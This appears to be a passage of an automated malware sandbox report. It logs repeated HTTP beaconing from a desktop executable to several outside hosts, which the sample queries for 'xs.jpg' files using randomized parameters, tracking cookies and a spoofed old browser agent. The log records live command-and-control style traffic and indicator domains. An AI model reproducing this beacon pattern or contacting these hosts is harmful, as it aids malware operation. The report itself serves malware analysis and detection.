                                  Jul 5, 2024 08:02:28.712152958 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:02:28.934261084 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:02:28 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:02:28 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  118192.168.2.94983154.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:29.271009922 CEST311OUTGET /images/xs.jpg?7a6a3bf3=-187402266 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159345|1720159259|3|23|0
                                  Jul 5, 2024 08:02:30.001461983 CEST595INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:29 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159349|1720159259|3|24|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  119192.168.2.94983244.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:30.032192945 CEST301OUTGET /xs.jpg?7f8f3cd8=-14779984 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159346|1720159259|3|23|0
                                  Jul 5, 2024 08:02:30.518532991 CEST586INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:30 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159350|1720159259|3|24|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  120192.168.2.94983344.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:30.739815950 CEST306OUTGET /images/xs.jpg?8644bbad=-1200973547 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159346|1720159260|3|23|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:02:31.257882118 CEST334INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:31 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159351|1720159260|4|24|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  121192.168.2.94983478.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:31.349246025 CEST193OUTGET /xs.jpg?8cd08851=-1502504717 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:32.130484104 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:31 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  122192.168.2.94983537.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:32.227758884 CEST206OUTGET /images/xs2.jpg?908734c0=-1522004096 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:33.006781101 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:32 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:02:33.012326002 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:02:33.237926960 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:02:33 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:02:33 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  123192.168.2.94983654.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:33.421324015 CEST309OUTGET /images/xs.jpg?9a275efc=46455532 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159349|1720159259|3|24|0
                                  Jul 5, 2024 08:02:34.172972918 CEST595INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:34 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159354|1720159259|4|25|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  124192.168.2.94983744.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:34.184065104 CEST303OUTGET /xs.jpg?9ffb83c1=-1075505530 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159350|1720159259|3|24|0
                                  Jul 5, 2024 08:02:34.711122990 CEST586INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:34 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159354|1720159259|3|25|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  125192.168.2.94983844.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:34.792355061 CEST306OUTGET /images/xs.jpg?a5ab2386=-2018641750 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159351|1720159260|4|24|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:02:35.304856062 CEST334INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:35 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159355|1720159260|4|25|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  126192.168.2.94983978.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:35.314815998 CEST193OUTGET /xs.jpg?a9db6871=-1485987388 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:35.970390081 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:35 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  127192.168.2.94984037.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:36.104938984 CEST204OUTGET /images/xs2.jpg?adce999d=316119470 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:36.887661934 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:36 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:02:36.892874956 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:02:37.115854979 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:02:37 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:02:37 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  128192.168.2.94984154.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:37.295682907 CEST312OUTGET /images/xs.jpg?bbd2b314=-1424130204 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159354|1720159259|4|25|0
                                  Jul 5, 2024 08:02:38.040688038 CEST595INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:37 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159357|1720159259|3|26|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  129192.168.2.94984244.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:38.250499964 CEST301OUTGET /xs.jpg?c1df27dd=251215592 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159354|1720159259|3|25|0
